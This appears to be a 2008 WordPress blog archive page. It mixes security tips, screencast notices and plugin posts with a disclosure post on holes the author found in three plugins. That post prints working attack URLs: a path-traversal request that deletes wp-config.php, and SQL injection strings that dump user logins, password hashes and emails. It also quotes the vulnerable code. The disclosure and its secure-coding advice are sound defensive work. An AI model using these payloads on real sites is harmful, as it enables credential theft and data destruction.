Using WordPress Securely

This post is written for blog readers and blog owners. I am not an expert, only a user. If you find any mistakes or you have some ideas, please feel free to tell me.

For blog readers

Do not register

Most of blogs allow non-member to comment, so I can see no reason to register.

How many of blogs you know which support HTTP over SSL? Without the support, your password or cookie (hash-hash-hash of password) are in clear text. Your classmates, roommates, colleagues, unencrypted wifi co-users, bother(s), sister(s) (don’t underestimate females), boy/girl friend(s) (plural is possible, nowadays) or someone who helps pass the notes probably are enjoying them.

It’s easy to know whether the blog web server support SSL or not: a) check address bar, if you read https, then that’s it; or b) read the HTML source, check the login form’s action attribute, if there is https in it, then that’s it.

However, the SSL support may only be used in logging process by default meaning your cookie may still be sent insecurely afterwards (and cookie need to be specified with secure attribute). Although, you can forcedly use https to visit throughout whole session, but the unauthenticated content may not be loaded.

If someone gets your cookies, they can log in and do whatever you can, like changing password (I wonder why WordPress doesn’t request your old password?) No need to mention what if they get your password.

Do you know the blog owner?

How do you know s/he didn’t modify WordPress core file? (actually, that only need one line or two, then s/he can get your password while you are registering/logging in)

If you really need to register, please must use a unique and special password for each blog.

Once again, password matters

You probably think even someone gets the hash of my password is OK, at least they don’t have my password in clear text. That’s completely true, if you use lazy password! I personally believe there are some people can recite md5 or sha1 hash of passwords “123” or “abc” from their memory. Yes, some lazy passwords are more complicated than that. But I also heard there is a DVD stores hashes of strings.

For blog owners

Do not allow blog reader to register

Continue reading →

Spotting vulnerabilities of plugins on WordPress Extend

This is first time I trid to find vulnerability of a software, and this is a one-time project (spending too much time to spot). I use WordPress 2.3.3 to test. I exported all plugins from WordPress Extend Plugin repository at 2008-02-05 08:00 to 10:49 and revisions were from r30828 to r30834, 2650 plugins directories.

It’s impossible to check them one by one and I am not a security expert, so I only did

grep -nr "\$wpdb.*\$_GET" * > wpdb-GET.txt

as well as POST, REQUEST and fopen. I think I may not check them all and I only check those are working (some have bugs) and quite new plugins (have updates after 2007) . After I finish GET, I may skip to check fopen.

You probably think I will miss a lot possibilities of vulnerabilities. Yes, the plugin developers may retrieve form data before querying a SQL statement. I can’t check all, if you have time, please check plugins which you are using on you blog and tell me what you find.

Currently I am checking GET and I was planning to finish it before posting this, however the first plugin I spotted a vulnerability has around 100 downloads a day. So I decided to keep updating this post when I get something (Hope I won’t get something in my own plugins).

Few hours past, I still didn’t spot new one. So I will keep an eye on Recently Updated plugins and this becomes an on-going project.

Got my mail?

If you get my mail about you plugins, please check the testing data and secure your plugin. Please must inform me as soon as you fixed the security holes. I will wait at least one week before I release testing data. If I make any mistake to mis-test your plugin, please let me know and I am so sorry.

Suggestions

• Secure SQL statement:
  • Must validate all form data before put them into SQL statement. For example, (int), intval(), is_numeric(), etc.
  • Use $wpdb->escape() to wrapping form data, this function will encode "\\;$%20.',//_/**/+\"- --" into "\\\\;$%20.\\',//_/**/+\\"- --".
  • $wpdb->prepare() is a better way to query
• Always check privilege of users for actions that need higher level permissions
• Remove irrelevant files from repository: such as .cache, .hg, etc
• Don’t let blog owner install files that won’t be used: such as readme.txt, screenshots

Spotted plugins

Currently found 3 plugins with vulnerabilities. Detail testing data will be released as soon as plugins get fixed, or at least one week later after spotted.

lenky-related-links 1.0.2 – Fixed on Feb 12, 2008 in version 1.0.3

Spotted at 2008-02-11T09:02:34+0800. Informed at 2008-02-11T09:07:45+0800 via contact form. As of 2008-02-11T09:02:39+0800, lenky-related-links has 4 downloads.

File deletion

http://test.dfed/wp/wp-content/plugins/lenkyex/cache_del.php?f=../../../../wp-config.php

statpress 1.2.3 – Fixed on Feb 10, 2008 in version 1.2.4

Spotted at 2008-02-06T23:21:21+0800. Informed at 2008-02-07T00:42:49+0800 via contact form. As of 2008-02-06T23:46:52+0800, statpress has 20,631 downloads

No user privilege checking when exporting data

http://test.dfed/wp/wp-admin/index.php?page=statpress&statpress_action=exportnow&from=20080101&to=20080301

Cause – L12 at statpress.php:

if ($_GET['statpress_action'] == 'exportnow') {
    iriStatPressExportNow();
}

This makes a global hole meaning you should be able to export at almost every blog page. Just move this block of code to admin page hooked function shall patch this hole.

SQL Injection

http://test.dfed/wp/wp-admin/index.php?page=statpress&statpress_action=exportnow&from=20080101&to=20080301'%20union%20select%202,concat(user_login,0x2f,user_pass,0x2f,user_email),3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from%20wp_users%20where%20id=1%20and%20id!='

You can remove id=1%20and%20 in order to export all account hash passwords.

Sample of export data:

date;time;ip;urlrequested;agent;referrer;search;nation;os;browser;searchengine;spider;feed
"20080206";"22:49:38";"192.168.1.12";"/wp/";"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.10) Gecko/20071213 Fedora/2.0.0.10-3.fc8 Firefox/2.0.0.10";"";"";"";"Linux";"Firefox 2";"";"";""
"admin/202cb962ac59075b964b07152d234b70/admin@gmail.com";"3";"4";"5";"6";"7";"8";"9";"10";"11";"12";"13";"14"

Cause – same as previous hole with:

function iriStatPressExportNow() {
    global $wpdb;
    $table_name = $wpdb->prefix . "statpress";
    $filename=get_bloginfo('title' )."-statpress_".$_GET['from']."-".$_GET['to'].".csv";
    header('Content-Description: File Transfer');
    header("Content-Disposition: attachment; filename=$filename");
    header('Content-Type: text/plain charset=' . get_option('blog_charset'), true);
    $qry = $wpdb->get_results("SELECT * FROM $table_name WHERE date>='".$_GET['from']."' AND date<='".$_GET&#91;'to'&#93;."';");
&#91;/code&#93;
Validate both <code>$_GET['form']</code> and <code>$_GET['to']</code> to fix.


<h3><a href="http://wordpress.org/extend/plugins/wp-photo-album/">wp-photo-album</a> 1.0 -  Fixed at Feb 7, 2008 6:38 PM in version 1.1</h3>
Spotted at 2008-02-07T02:57:02+0800. Informed at 2008-02-07T03:02:56+0800 via email As of 2008-02-07T02:58:35+0800 wppa has 83 downloads.
<h4>SQL Injection</h4>
<pre>http://test.dfed/wp/?page_id=3&amp;album=1&amp;photo=123456789%20union%20select%20concat(user_login,0x2f,user_pass,0x2f,user_email)%20from%20wp_users%20where%20id=1</pre>
Where <code>photo=123456789</code> is a non-exist photo.

You will get something like
<pre>admin/202cb962ac59075b964b07152d234b70/admin@gmail.com</pre>

Cause - L1001 at <code>wppa.php</code>:
// get the name of a full sized image
function wppa_photo_name($id = '', $return = FALSE) {
    global $wpdb;
    if ($id == '') { $id = $_GET['photo']; }
    $name = $wpdb->get_var("SELECT name FROM " . PHOTO_TABLE . " WHERE id=$id");

Related Posts

• Using WordPress Securely

talkPress 004: Quick WordPress Upgrading

What’s in this episode

• WordPress Upgrading,
• Scripts for Upgrading, Database Backup, Database Restoring,
• and Lots of “blow” hosts. 🙂

Watch it or download it!

You can watch this episode (19m22s) or download .ogg (52.0MB, Theora 15fps/Vorbis 64kbps), .mp4 (MB, H.264 15fps/AAC 64kbps) or .flv (98.9MB, 15fps / 64kbps) on blip.tv. You can also watch this episode on Google Video and Internet Archive.
Continue reading →

talkPress 003: An Example of Conditional Tags

What’s in this episode

• Usage of Conditional Tags

Watch it or download it!

You can watch this episode (16m150s) or download .ogg (68.1MB, Theora/Vorbis), .mp4 (46.9MB, H.264/AAC) or .flv (93.3MB, 15fps) on blip.tv. You can also watch this episode on Google Video and Internet Archive.
Continue reading →

Block, block and block WordPress spammers

Sadly, blocking seems to be the only way we can stop them ruining our blogs. Akismet works perfectly, it blocks 100+ spams a day. However the bandwidth is wasted, although the amount is not much.

I tried to find out who requested wp-comments-post.php more than 5 times before 18th of November. The results more than 100 IPs, I denied them in .htaccess. Less than 7 days, the number of last 15 days spams dropped from 1500+ to 850. If there is a WordPress plugin can use Akismet’s data to block, that would be more efficient. Yes, this could be my next WordPress plugin.

Updated at 12/10: I have unblocked those IPs for few days, interesting thing is the Akismet blocking count didn’t increase. Now is around 100. I wonder if spammer’s programs record were they blocked?

歷史上的今天 WordPress 外掛

這個頁面是簡單的中文介紹，詳細資訊請參考外掛主站（英文）。若有使用上的問題，歡迎於此處發問。

簡介

這個外掛的靈感是來自於維基百科的首頁。它能列出同今日日期的歷史文章或是同特定文章的發表日期的文章。

特點

• 完全自訂 HTML
• 支援模組
• 自動列出 — 不需添加程式碼
• 在 Dashboard 中列出七日內舊文
• 外掛設定頁面
• 搜尋表單 — 以不完整的日期進行搜索
• 完全移除外掛
• 多國語系
  • bg_BG — 保加利亞語
  • zh_TW — 繁體中文

自動地將「歷史上的今天」列表列於文章末。也能以模組方式呈現或是在需要的地方呼叫 OTDList()。

參考範例

畫面截圖。

下載

請至 WordPress Extend 下載最新版本。

Internationalizing WordPress Plugin

I just finished writing this article. It is only available in OpenOffice Text and PDF and licensed under GNU Free Documentation License.

It describes how I internationalizing my WordPress plugin, what tools I used, the work flow, etc.

Preparing to upgrade WordPress to 2.3

Update: Just upgraded to WordPress 2.3.

I think it’s time to prepare for upgrading to WordPress 2.3. Why? First, as we all should already notice that 2.3 has supported tags and those the plun-ins which are related to category will be malfunctioning. If you have activated many plug-ins or you don’t use default or classic theme, you are better to start testing.

There is a great list that could help you to understand what’s going on WordPress 2.3 and a official post for upgrading.

I have a local server for my blog. I used to make modifications on it, then rsync to my remote server which is a public server. So, I don’t need to create additional database or blog on my remote server. Here are the steps that I took for upgrading to 2.3-RC1:

Steps

1. Backup database

mysqldump -u [username] -p [dbname] > wp_backup.sql

There is an option, --add-drop-table, for mysqldump but I think it’s better to completely clean a database. That is deleting and creating a database. Then execute the wp_backup.sql.

You may have MyPHPAdmin, that will be fine if you use it, instead.

Just in case that you have really bad luck: Restore your MySQL database.
Continue reading →

Still need to upgrade to 2.2.3

I was planning directly upgrading 2.2.2 to 2.3. But WordPress Multiple Versions Pwnpress Exploitation Tookit (0.2pub) changed my mind. This exploit also effects 2.2, 2.2.2, 2.0.5, 2.0.6, 2.1, …. One thing I don’t know: “What exactly this exploit can damage?”

WP Plugin: On this day demo post

This is a demo post for “On this day“.

The OTD list at sidebar of home page lists posts which have same calendar date as today’s.

The OTD list at sidebar lists posts which were published July 29th same as this post.

You are welcome to leave a comment about your blog, pingback or trackback here if you use this plugin.